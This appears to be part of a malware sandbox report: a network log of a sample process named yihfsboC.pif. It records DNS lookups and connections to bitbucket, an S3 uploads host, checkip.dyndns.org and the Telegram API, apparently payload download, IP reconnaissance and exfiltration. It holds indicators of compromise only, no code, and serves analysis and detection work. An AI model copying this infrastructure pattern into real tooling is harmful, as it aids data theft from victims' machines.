                                                                                                                Nov 26, 2024 08:26:23.082302094 CET44349985149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:23.222271919 CET44349979149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:23.222502947 CET44349979149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:23.222594023 CET49979443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:23.222820044 CET49979443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:23.224016905 CET49987443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:23.224055052 CET44349987149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:23.224153042 CET49987443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:23.224384069 CET49987443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:23.224397898 CET44349987149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:23.535350084 CET44349980149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:23.535584927 CET44349980149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:23.535653114 CET49980443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:23.535927057 CET49980443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:23.537146091 CET49988443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:23.537189960 CET44349988149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:23.537266970 CET49988443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:23.537534952 CET49988443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:23.537548065 CET44349988149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:24.547740936 CET44349985149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:24.549407959 CET49985443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:24.549438000 CET44349985149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:24.549484968 CET49985443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:24.549494982 CET44349985149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:24.638554096 CET44349987149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:24.640265942 CET49987443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:24.640300989 CET44349987149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:24.640367031 CET49987443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:24.640372992 CET44349987149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:24.997473001 CET44349988149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:24.999100924 CET49988443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:24.999139071 CET44349988149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:24.999197960 CET49988443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:24.999203920 CET44349988149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.245743990 CET44349985149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.245882988 CET44349985149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.245928049 CET49985443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.246186972 CET49985443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.247224092 CET49994443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.247247934 CET44349994149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.247328043 CET49994443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.247524977 CET49994443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.247538090 CET44349994149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.283241987 CET44349987149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.283521891 CET44349987149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.283587933 CET49987443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.283814907 CET49987443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.284879923 CET49995443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.284925938 CET44349995149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.285005093 CET49995443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.285198927 CET49995443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.285214901 CET44349995149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.589653015 CET44349988149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.589885950 CET44349988149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.589963913 CET49988443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.590249062 CET49988443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.591501951 CET49996443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.591532946 CET44349996149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:25.591619015 CET49996443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.591845989 CET49996443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:25.591857910 CET44349996149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:26.610198021 CET44349994149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:26.612251043 CET49994443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:26.612273932 CET44349994149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:26.612330914 CET49994443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:26.612334967 CET44349994149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:26.759533882 CET44349995149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:26.761060953 CET49995443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:26.761080980 CET44349995149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:26.761133909 CET49995443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:26.761145115 CET44349995149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:27.055600882 CET44349996149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:27.057230949 CET49996443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:27.057245970 CET44349996149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:27.057307959 CET49996443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:27.057317019 CET44349996149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.642550945 CET44349995149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.642782927 CET44349995149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.642865896 CET49995443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.643136024 CET49995443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.644403934 CET50009443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.644453049 CET44350009149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.644545078 CET50009443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.644756079 CET50009443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.644774914 CET44350009149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.656661034 CET44349994149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.656748056 CET44349994149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.656807899 CET49994443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.657174110 CET49994443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.658320904 CET50010443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.658370972 CET44350010149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.658435106 CET50010443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.658642054 CET50010443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.658655882 CET44350010149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.693522930 CET44349996149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.693741083 CET44349996149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.693814039 CET49996443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.694140911 CET49996443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.695363045 CET50011443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.695415974 CET44350011149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:31.695481062 CET50011443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.695687056 CET50011443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:31.695703983 CET44350011149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:33.013314009 CET44350009149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:33.015065908 CET50009443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:33.015103102 CET44350009149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:33.015146017 CET50009443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:33.015170097 CET44350009149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:33.067838907 CET44350010149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:33.069330931 CET50010443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:33.069369078 CET44350010149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:33.069422960 CET50010443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:33.069430113 CET44350010149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:33.157670021 CET44350011149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:33.159243107 CET50011443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:33.159271955 CET44350011149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:33.159322977 CET50011443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:33.159337044 CET44350011149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:33.574304104 CET44350009149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:43.520013094 CET50047443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:43.520019054 CET44350047149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:43.521298885 CET50049443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:43.521339893 CET44350049149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:43.521435022 CET50049443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:43.521441936 CET44350049149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:43.567671061 CET44350048149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:43.569844961 CET50048443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:43.569866896 CET44350048149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:43.569928885 CET50048443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:43.569932938 CET44350048149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.076633930 CET44350047149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.076868057 CET44350047149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.076953888 CET50047443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.077373981 CET50047443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.078699112 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.078733921 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.078799963 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.079068899 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.079082966 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.095063925 CET44350049149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.095279932 CET44350049149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.095350981 CET50049443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.095788956 CET50049443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.096820116 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.096868038 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.097048998 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.097337008 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.097353935 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.123539925 CET44350048149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.123625040 CET44350048149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.123852968 CET50048443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.124126911 CET50048443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.125546932 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.125598907 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:44.125686884 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.125965118 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:44.125982046 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.487220049 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.489825010 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.489846945 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.489928007 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.489933014 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.498245955 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.499710083 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.499738932 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.499800920 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.499809027 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.557514906 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.559333086 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.559359074 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:45.559421062 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:45.559432983 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.030343056 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.030421019 CET44350057149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.030522108 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:46.066373110 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.066478968 CET44350055149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.066536903 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:46.115098000 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.115204096 CET44350056149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:46.115283966 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.552403927 CET50055443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.553378105 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.553416967 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:49.553572893 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.553765059 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.553778887 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:49.812751055 CET50056443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.813354015 CET50071443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.813369036 CET44350071149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:49.813440084 CET50071443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.813709021 CET50071443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:49.813719034 CET44350071149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:50.191564083 CET50057443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.192121983 CET50074443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.192208052 CET44350074149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:50.192373991 CET50074443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.192543983 CET50074443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.192574024 CET44350074149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:50.918680906 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:50.920572042 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.920614004 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:50.920675993 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:50.920682907 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:51.271056890 CET44350071149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:51.313810110 CET50071443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:51.465322971 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:51.465464115 CET44350070149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:51.465524912 CET50070443192.168.2.7149.154.167.220
                                                                                                                Nov 26, 2024 08:26:51.647811890 CET44350074149.154.167.220192.168.2.7
                                                                                                                Nov 26, 2024 08:26:51.688827038 CET50074443192.168.2.7149.154.167.220
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 26, 2024 08:24:41.299941063 CET6513053192.168.2.71.1.1.1
                                                                                                                Nov 26, 2024 08:24:41.445080042 CET53651301.1.1.1192.168.2.7
                                                                                                                Nov 26, 2024 08:24:43.948023081 CET6274353192.168.2.71.1.1.1
                                                                                                                Nov 26, 2024 08:24:44.191188097 CET53627431.1.1.1192.168.2.7
                                                                                                                Nov 26, 2024 08:24:54.169706106 CET5961253192.168.2.71.1.1.1
                                                                                                                Nov 26, 2024 08:24:54.310570955 CET53596121.1.1.1192.168.2.7
                                                                                                                Nov 26, 2024 08:25:06.254781008 CET5437253192.168.2.71.1.1.1
                                                                                                                Nov 26, 2024 08:25:06.402973890 CET53543721.1.1.1192.168.2.7
                                                                                                                Nov 26, 2024 08:25:24.926594019 CET5490853192.168.2.71.1.1.1
                                                                                                                Nov 26, 2024 08:25:25.067562103 CET53549081.1.1.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 26, 2024 08:24:41.299941063 CET | 192.168.2.7 | 1.1.1.1 | 0xf56e | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:43.948023081 CET | 192.168.2.7 | 1.1.1.1 | 0x345e | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:54.169706106 CET | 192.168.2.7 | 1.1.1.1 | 0x4e76 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:25:06.254781008 CET | 192.168.2.7 | 1.1.1.1 | 0x43e | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:25:24.926594019 CET | 192.168.2.7 | 1.1.1.1 | 0xfca1 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 26, 2024 08:24:41.445080042 CET | 1.1.1.1 | 192.168.2.7 | 0xf56e | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:41.445080042 CET | 1.1.1.1 | 192.168.2.7 | 0xf56e | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:41.445080042 CET | 1.1.1.1 | 192.168.2.7 | 0xf56e | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:44.191188097 CET | 1.1.1.1 | 192.168.2.7 | 0x345e | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 08:24:44.191188097 CET | 1.1.1.1 | 192.168.2.7 | 0x345e | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 08:24:44.191188097 CET | 1.1.1.1 | 192.168.2.7 | 0x345e | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.70.225 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:44.191188097 CET | 1.1.1.1 | 192.168.2.7 | 0x345e | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.225.41 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:44.191188097 CET | 1.1.1.1 | 192.168.2.7 | 0x345e | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.117.217 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:44.191188097 CET | 1.1.1.1 | 192.168.2.7 | 0x345e | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.179 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:44.191188097 CET | 1.1.1.1 | 192.168.2.7 | 0x345e | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.29.61 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:44.191188097 CET | 1.1.1.1 | 192.168.2.7 | 0x345e | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.25.213 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:44.191188097 CET | 1.1.1.1 | 192.168.2.7 | 0x345e | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.217.137.177 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:44.191188097 CET | 1.1.1.1 | 192.168.2.7 | 0x345e | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.29.69 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:54.310570955 CET | 1.1.1.1 | 192.168.2.7 | 0x4e76 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 26, 2024 08:24:54.310570955 CET | 1.1.1.1 | 192.168.2.7 | 0x4e76 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:54.310570955 CET | 1.1.1.1 | 192.168.2.7 | 0x4e76 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:54.310570955 CET | 1.1.1.1 | 192.168.2.7 | 0x4e76 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:54.310570955 CET | 1.1.1.1 | 192.168.2.7 | 0x4e76 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:24:54.310570955 CET | 1.1.1.1 | 192.168.2.7 | 0x4e76 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:25:06.402973890 CET | 1.1.1.1 | 192.168.2.7 | 0x43e | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 26, 2024 08:25:25.067562103 CET | 1.1.1.1 | 192.168.2.7 | 0xfca1 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                • bitbucket.org
                                                                                                                • bbuseruploads.s3.amazonaws.com
                                                                                                                • api.telegram.org
                                                                                                                • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49710 | 132.226.8.169 | 80 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:24:54.457456112 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
Nov 26, 2024 08:24:56.550540924 CET | 272 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Tue, 26 Nov 2024 07:24:56 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 103
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49741 | 132.226.8.169 | 80 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
Nov 26, 2024 08:25:06.281001091 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
Nov 26, 2024 08:25:09.056787014 CET | 272 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Tue, 26 Nov 2024 07:25:08 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 103
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                2 | 192.168.2.7 | 49758 | 132.226.8.169 | 80 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                Nov 26, 2024 08:25:13.399166107 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Nov 26, 2024 08:25:14.908473969 CET | 272 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Tue, 26 Nov 2024 07:25:14 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 103
